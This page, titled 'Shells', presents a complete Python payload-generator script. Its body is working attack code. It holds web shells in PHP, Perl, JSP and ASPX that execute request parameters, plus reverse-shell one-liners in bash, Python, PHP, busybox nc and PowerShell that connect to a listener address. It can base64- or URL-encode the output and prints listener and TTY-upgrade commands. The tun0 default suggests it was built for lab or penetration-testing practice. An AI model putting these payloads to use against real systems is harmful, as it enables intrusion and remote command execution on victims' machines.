Shells
Built with AI
My Script:
#! /usr/bin/env python3
import argparse
import base64
import urllib.parse
import socket
import fcntl
import struct
# Web-shell templates, keyed by the name accepted by ``shells web -p``.
# ``code`` is written out verbatim — web mode never calls str.format on it,
# which is why the perl template can safely contain the single-braced
# ``$ENV{QUERY_STRING}``. ``ext`` is the intended file extension; nothing in
# this script reads it (the output path comes only from ``-o``).
WEB_PAYLOADS = {
    "php": {"ext": "php", "code": """<?php isset($_REQUEST['cmd']) && system($_REQUEST['cmd']); ?>"""},
    "perl": {"ext": "pl", "code": """#!/usr/bin/perl -w use strict; print "Content-type: text/html\\n\\n"; my $cmd = $ENV{QUERY_STRING}; system($cmd); """},
    # Multi-line templates: the continuation lines are part of the string
    # literal, so their (absent) indentation is emitted as-is.
    "jsp": {"ext": "jsp", "code": """<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if(cmd != null){
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while((line = r.readLine()) != null){ out.println(line); }
}
%>"""},
    "aspx": {"ext": "aspx", "code": """<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
void Page_Load(){
Process.Start("cmd.exe", "/c " + Request["cmd"]);
}
</script>"""}
}
# Reverse-shell templates, keyed by the name accepted by ``shells rev -p``.
# ``code`` is a ``str.format`` template: main() fills ``{ip}`` and ``{port}``
# with the listener address, so every literal brace in a template must be
# doubled (the powershell entry writes ``{{0}}`` and ``{{$d=...}}`` for that
# reason). ``ext`` is not read anywhere in this script.
REV_PAYLOADS = {
    "bash": {"ext": "sh", "code": "bash -i >& /dev/tcp/{ip}/{port} 0>&1"},
    "python3": {"ext": "py", "code": """python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("{ip}",{port}));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'"""},
    "python": {"ext": "py", "code": """python -c 'import socket,os,pty;s=socket.socket();s.connect(("{ip}",{port}));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'"""},
    "php": {"ext": "php", "code": """<?php $ip='{ip}';$port={port}; $sock=fsockopen($ip,$port); exec("/bin/sh -i <&3 >&3 2>&3"); ?>"""},
    "busybox": {"ext": "sh", "code": "busybox nc {ip} {port} -e /bin/bash"},
    "powershell": {"ext": "ps1", "code": """$c=New-Object System.Net.Sockets.TCPClient('{ip}',{port});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length))-ne 0){{$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1 | Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$s.Write(([text.encoding]::ASCII).GetBytes($r2),0,$r2.Length)}}"""}
}
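def get_tun0_ip(iface="tun0"):
    """Return the IPv4 address bound to *iface* (default ``tun0``), or None.

    Issues the Linux ``SIOCGIFADDR`` ioctl (0x8915) on a throwaway UDP
    socket; the address occupies bytes 20..24 of the returned ``ifreq``.

    Args:
        iface: Interface name as str or bytes. It is truncated to 15 bytes,
            the kernel's IFNAMSIZ limit minus the terminating NUL.

    Returns:
        Dotted-quad string, or None when the interface does not exist, has
        no IPv4 address, or the platform does not support this ioctl.
    """
    if isinstance(iface, str):
        iface = iface.encode()
    # The socket is only a file descriptor for the ioctl; the context manager
    # closes it on every path (the original leaked it).
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        try:
            ifreq = fcntl.ioctl(
                sock.fileno(),
                0x8915,  # SIOCGIFADDR
                struct.pack("256s", iface[:15]),
            )
        except OSError:
            return None
    return socket.inet_ntoa(ifreq[20:24])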
def encode_payload(data, encoder):
    """Apply the named text encoding to *data*.

    ``encoder`` may be ``"base64"`` (UTF-8 bytes, standard alphabet),
    ``"url"`` (``urllib.parse.quote`` with its default safe set) or a
    falsy value for no encoding. Any other name leaves *data* untouched.
    """
    transforms = {
        "base64": lambda text: base64.b64encode(text.encode()).decode(),
        "url": urllib.parse.quote,
    }
    if not encoder:
        return data
    transform = transforms.get(encoder)
    return data if transform is None else transform(data)
def list_payloads(db):
    """Print a header followed by one ``" - name"`` line per key of *db*."""
    lines = ["[+] Available payloads:"]
    lines.extend(f" - {name}" for name in db)
    print("\n".join(lines))
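def write_output(data, path):
    """Deliver the generated text either to a file or to stdout.

    Args:
        data: Text to emit.
        path: Destination file path; when falsy (None/""), *data* is printed
            to stdout instead.

    Raises:
        OSError: If *path* is given but cannot be opened for writing.
    """
    if not path:
        print(f"[+] Payload:\n {data}")
        return
    # Pin the encoding: ``open()``'s default is locale-dependent, so the same
    # text could otherwise be written differently on different hosts.
    with open(path, "w", encoding="utf-8") as handle:
        handle.write(data)
    print(f"[+] Written to {path}")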
def print_listener_hint(payload_name, ip, port):
    """Print the matching listener line and the two TTY-upgrade recipes.

    Only the ``"powershell"`` payload selects the Windows variant (``rlwrap nc``);
    every other name gets the plain ``nc`` line. The recipes are the same for
    both.
    """
    if payload_name == "powershell":
        target, prefix = "Windows", "rlwrap "
    else:
        target, prefix = "Linux/Unix", ""
    print(f"\n[*] Listener ({target} target):\n {prefix}nc {ip} {port}")
    # Both recipes end with the same post-background stty sequence.
    tty_tail = (
        "CTRL+Z\n stty raw -echo; fg; ls; export SHELL=/bin/bash; "
        "export TERM=screen; stty rows 38 columns 116; reset;"
    )
    print(f"\n[*] Full TTY Python:\n python3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n {tty_tail}")
    print(f"\n[*] Full TTY Script:\n script /dev/null -qc /bin/bash\n {tty_tail}")
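def add_custom_help(parser):
    """Attach the standard ``-h/--help`` flag to *parser*.

    Every parser in this file is created with ``add_help=False`` and then
    registers help explicitly through this helper.
    """
    parser.add_argument("-h", "--help", action="help")


def _add_payload_options(subparser, *, listener=False):
    """Register the payload options shared by the ``web`` and ``rev`` sub-commands.

    With ``listener=True`` the ``-lh/--local-host`` and ``-lp/--local-port``
    options are inserted right after ``-p`` so the ``rev`` help output keeps
    its previous option order.
    """
    subparser.add_argument("-p", "--payload", metavar="NAME",
                           help="Payload name; see --list-payloads")
    if listener:
        subparser.add_argument("-lh", "--local-host", help="Default To Tun0 IP")
        subparser.add_argument("-lp", "--local-port", type=int, default=443, help="Default To 443")
    subparser.add_argument("-o", "--output", metavar="FILE",
                           help="Write the payload to FILE instead of printing it")
    subparser.add_argument("--list-payloads", action="store_true",
                           help="List the payload names for this mode and exit")
    subparser.add_argument("--encode", choices=["base64", "url"],
                           help="Encode the generated text before output")


def build_parser():
    """Build the ``shells`` argument parser.

    Returns:
        An ``argparse.ArgumentParser`` with two required sub-commands under
        ``dest="mode"``: ``web`` and ``rev``. ``rev`` additionally takes the
        listener host/port options (port defaults to 443; the host falls back
        to the tun0 address in main()).
    """
    parser = argparse.ArgumentParser(
        prog="shells",
        description="Web/Reverse Shell Payload Generator",
        add_help=False,
    )
    add_custom_help(parser)
    sub = parser.add_subparsers(dest="mode", required=True)

    web = sub.add_parser("web", help="Web Shell Payloads", add_help=False)
    add_custom_help(web)
    _add_payload_options(web)

    rev = sub.add_parser("rev", help="Reverse Shell Payloads", add_help=False)
    add_custom_help(rev)
    _add_payload_options(rev, listener=True)
    return parser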
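def main():
    """Parse the command line and run the selected mode.

    ``web`` mode emits a WEB_PAYLOADS template as-is; ``rev`` mode fills a
    REV_PAYLOADS template with the listener address (``-lh``, else the tun0
    address) and port, then prints the listener hint. A missing or unknown
    ``-p`` name shows that sub-command's help and exits.
    """
    parser = build_parser()
    args = parser.parse_args()
    if args.mode == "web":
        _run_web(parser, args)
    elif args.mode == "rev":
        _run_rev(parser, args)


def _select_payload(parser, args, db):
    """Return the *db* entry named by ``-p``; otherwise show help and exit."""
    if args.payload in db:
        return db[args.payload]
    # Same parser object as the original parse — no need to rebuild it just to
    # print help. The help action raises SystemExit(0).
    parser.parse_args([args.mode, "-h"])
    raise SystemExit(0)


def _run_web(parser, args):
    """Handle ``web`` mode: list names, or emit the chosen template verbatim."""
    if args.list_payloads:
        list_payloads(WEB_PAYLOADS)
        return
    payload = _select_payload(parser, args, WEB_PAYLOADS)
    write_output(encode_payload(payload["code"], args.encode), args.output)


def _resolve_local_host(args):
    """Return ``-lh`` if given, else the tun0 address; None (after a message) if neither."""
    if args.local_host:
        return args.local_host
    tun0_ip = get_tun0_ip()
    if not tun0_ip:
        print("[-] Tun0 Not Found. Please specify --local-host/-lh")
    return tun0_ip


def _run_rev(parser, args):
    """Handle ``rev`` mode: list names, or fill and emit the chosen template."""
    if args.list_payloads:
        list_payloads(REV_PAYLOADS)
        return
    # Validate the payload name before touching the network interface, as before.
    payload = _select_payload(parser, args, REV_PAYLOADS)
    local_host = _resolve_local_host(args)
    if not local_host:
        return
    filled = payload["code"].format(ip=local_host, port=args.local_port)
    write_output(encode_payload(filled, args.encode), args.output)
    print_listener_hint(args.payload, local_host, args.local_port)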
if __name__ == "__main__":
    # Script entry point; importing the module runs nothing.
    raise SystemExit(main())
Dependencies:
Usage:
Help Menu:
Current Available Shells:
Generate PHP Web Shell:
Generate BASH Reverse Shell:
Generate PowerShell Reverse Shell:
Encodings:
Output the Payload to a File: